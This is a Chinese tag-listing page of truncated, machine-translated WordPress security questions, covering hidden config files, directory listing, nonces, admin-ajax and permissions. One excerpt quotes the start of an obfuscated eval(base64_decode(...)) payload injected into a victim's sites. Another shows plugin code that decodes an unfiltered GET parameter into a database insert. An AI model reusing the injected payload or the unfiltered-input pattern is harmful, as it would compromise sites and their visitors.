您当前的位置:首页 > TAG信息列表 > security
Filter any HTTP request URI?
我想过滤通过HTTP API完成的任何HTTP请求URI。用例:WordPress更新检查转到http://api.wordpress.org/core/version-check/1.6/, 但是https://api.wordpress.org/core/version-check/1.6/ 也很管用,我想一直用这个</新的WordPress文件取自http://wordpress.org/wordpress-3.4.2.zip, 但是https://wordpress.org/wordpres
如何通过隐藏非公开文件来提高WordPress的安全性?
e、 g。curl -I http://ma.tt/blog/wp-config.php 200 OK wp配置。php不是面向公众的文件,因为它当前只返回空白页面,所以为什么不返回404呢。(所以不会被谷歌缓存)此外,对于文件,如readme.html, 它应该隐藏起来,因为它会泄露你的wordpress版本,例如。http://ma.tt/blog/readme.html 因此,目前我在web服务器级别选择了几个文件和块,例如:。wp-config.php wp-config
使用重写保护登录页面
我正试图偷偷摸摸地使用iis来保护wordpress登录页面(这不是我运行windows服务器的选择,但这是事实)。到目前为止,只有登录页面本身会在将您转发到管理面板之前加载自己,因此在成功(或不成功)登录后,第一条规则会启动并将您发送到虚拟页面。我目前的规则:<rule name=\"redirect\" patternSyntax=\"ECMAScript\"> <match url=\"^installbase/wp-login\\.php\" />
About WordPress site security
如果我在服务器上安装WordPress,是否意味着Akismet会自动安装如果是,我是否仍然需要创建电子邮件验证和captcha工具来提高网站安全性(我看到WP本身没有此功能)captcha测试推荐什么-简单的php captcha或一些图形化ajax发明(通过绘制或移动对象等)?我的网站将是相当简单的,但会有用户的评论在每个页面上。
WP_INSERT_POST禁用HTML筛选器
我有输入值“<iframe>....</iframe>“(param‘post\\u content’)。当我执行wp\\u insert\\u post时,函数会切断我的标记。如何在中禁用HTML筛选器wp_insert_post ?
Masking logout URL
主要目的是隐藏网站是由wordpress驱动的。我已经把登录部分都锁定了,但注销URL仍然有那些被破坏的内容wp 这是一个wordpress网站。有没有办法屏蔽这个URL?可能通过客户端链接指向的自定义重定向的结合www.site.com/logout/ 但有些东西functions.php 重建实际注销链接?我尝试过wp_logout_url(\'$index.php\') 但这只是重定向。我也试过了add_filter( \'wp_logout_url\', \'cusotm_logout\' );&
禁用上载文件夹的目录浏览
我正在使用Wordpress作为一个简单网站的CMS。我想阻止用户浏览目录,如wp content/uploads文件夹或我的主题的任何目录。我的主机不允许我在中使用“Options”或“DirectoryIndex”。htaccess文件。我试着把一个。htaccess文件位于/uploads/文件夹中,其中包含“IndexIgnore*”。但是,使用该选项时,/uploads/文件夹中的所有图像都不会显示在我的网站上。我还尝试使用密码保护目录。htpasswd文件,但这会给我的网站的任何访问者一个弹出
文件和目录权限
我在CentOS服务器上安装了最新的WordPress 3.5。当我尝试访问时http://example.com/wp-includes/, 我收到了目录列表:(Index of wp-includes).我在的顶部添加了以下代码.htaccess 文件,并修复了问题:Options -Indexes IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti* 当我尝试访问中的PHP文件时,我的问题wp-includes
如果黑客将BLOG_CHARSET更改为UTF-7,是否会使WordPress容易受到进一步的攻击?
我有一个客户最近被黑客攻击了,我注意到她的网站上出现了一些奇怪的角色,比如和。事实证明,黑客在wp_options 数据库中的表。我将其设置回UTF-8,但我想知道在设置为UTF-7期间,是否会产生任何安全漏洞?我搜索了一下发现WordPress UTF-7 vulnerability that was fixed in version 2.0.6. 我们正在运行WordPress的最新版本,因此他们不可能使用该漏洞,但是否有其他与UTF-7相关的漏洞?真的,除了让人痛苦之外,黑客还有什么理由改变blo
随机数可以多次重复使用吗?错误/安全问题?
我已经读到nonce只能一次性使用,在ajax请求之后,您应该发出一个新的nonce,以便在下一个ajax请求中,会向服务器发送一个新的nonce。然而,我只是使用相同的nonce令牌测试了重复的ajax请求,并且针对每个请求wp_verify_nonce 在相同的标记上返回true,这意味着它可以重复使用几十次。这是故意的还是bug?我是否仍然需要为每个ajax请求发出新的nonce,或者相同的nonce是否可以继续用于将来的所有请求?
How does admin-ajax.php work?
我们与外部开发人员有一些问题。我们想限制访问wp-admin 仅限现场内部访问(通过VPN). 这样就不会受到外部用户的攻击。我们可以从站点中枚举管理员,不希望他们被钓鱼。我们的开发人员说我们不能这样做,因为网站需要有外部访问的管理页面,这样页面才能正常工作。特别是admin-ajax 页什么是admin-ajax.php 页码do?它位于WordPress的管理部分。最终用户是否未经身份验证就访问?让外部用户使用此功能是否不安全?
security issue in wordpress?
我已在中安装wordpresswww.mysite.com/user 现在假设有人熟悉wordpress,他/她可以通过www.mysite.com/user/memberswww.mysite.com/user/groups 甚至他都能看到www.mysite.com/user 没有登录到我的网站。有什么方法可以防止这种情况发生吗。类似于如果他没有登录或任何类型的重定向到特定url,访问就会被拒绝。或者你没有权限访问/members/ 在此服务器上。因此,我面临着很多问题。我使用frisco作为budd
Wp-minify插件的文件权限
我担心安装Wp-Minify plugin. 但它需要777权限才能访问位于wp uploads目录内的缓存目录。这不是一个安全问题吗?
无需使用用户和角色即可实现基本密码保护
我正在使用WooCommerce,希望能够对产品进行密码保护(如果可能的话,最好是整个类别),但不使用用户&;WP中内置了角色功能(因为我需要匿名来宾也能够输入密码)。我已经尝试了WP中内置的标准post密码保护,但所做的只是阻止显示产品的描述(即“post”的正文),但它不会阻止您查看产品图像、详细信息等(事实上,您也可以购买该产品)。我自己写了一些东西(基本上,我在我想要保护的任何页面中都包含了一个自定义属性,然后自定义页面模板的PHP代码,以便在显示页面之前需要密码,但我的尝试(到目前为止)并
Nginx+WordPress:将其配置为安全、可靠和快速的最佳实践?
BACKGROUND:运行Linode上的所有内容。遵循“入门”、“保护服务器”、“Ubuntu 12.04上的LEMP服务器”和“使用WordPress管理Web内容”指南,我成功地运行了我的第一个WordPress网站。现在,我想知道除了指南之外,我应该做什么(或者至少得到一些有经验的建议,我应该考虑做什么)。QUESTION:What further configuration should I implement to produce the most solid, reliable, secur
Is this plugin safe to run?
这是从wordpress插件中提取的代码。即使未过滤变量,运行是否安全?wpdb类是否也会过滤以防止任何注入?list($email_id, $user_id, $url, $anchor) = explode(\';\', base64_decode($_GET[\'r\']), 4); $wpdb->insert(NEWSLETTER_STATS_TABLE, array( \'email_id\' => $email_id,
从安全的角度来看,应该转义BloInfo()或Get_BloomInfo()吗?
我已经回顾了很多关于WP主题和插件安全性的信息,并且理解了应该在主题和插件中转义属性和HTML值的概念。我看到了bloginfo() 和echo get_bloginfo() 用于标准和内部esc_html() 或esc_attr() 作用Genesis 和_s, Automatic的基本主题都会转义这些值,但WP自己的codex主题标准指南并没有说明任何关于转义这些值的内容。我查过WP代码(wp-includes/option.php) 似乎对传递的值进行了一些清理get_option() 但它看起来也
这是WordPress的安全漏洞吗?
<?php if ( ! is_admin() ) return; echo \'You should not see this if you\\\'re not logged in!\'; ?> 如果你把这个放在mu-plugin, 并转到您的管理员,例如。,example.com/wp-admin/ 当您未登录时,您是否能够看到echo?
WordPress安全-如何阻止替代WordPress访问
我有一个自己托管的Wordpress 3.5博客。我正在研究它的安全性,并试图阻止非作者访问任何他们不应该访问的管理内容。最近我试过Better Wordpress Security, 我真的很喜欢他们的一些htaccess建议。主要是使用唯一密钥隐藏/wp admin/的密钥,即使它有几个循环孔,您也可以使用注销查询找到密钥。无论如何:假设我/wp admin/和wp登录。php现在带来了一个404 not found,我以为自动机器人会停止攻击我。但他们没有。我仍然收到网站锁定通知。我猜测Wordpr
Wp-config.php的默认安装权限
最近我注意到,我们在服务器上安装的许多wordpress都受到了这种东西的攻击和攻击eval(base64_decode(\"DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRy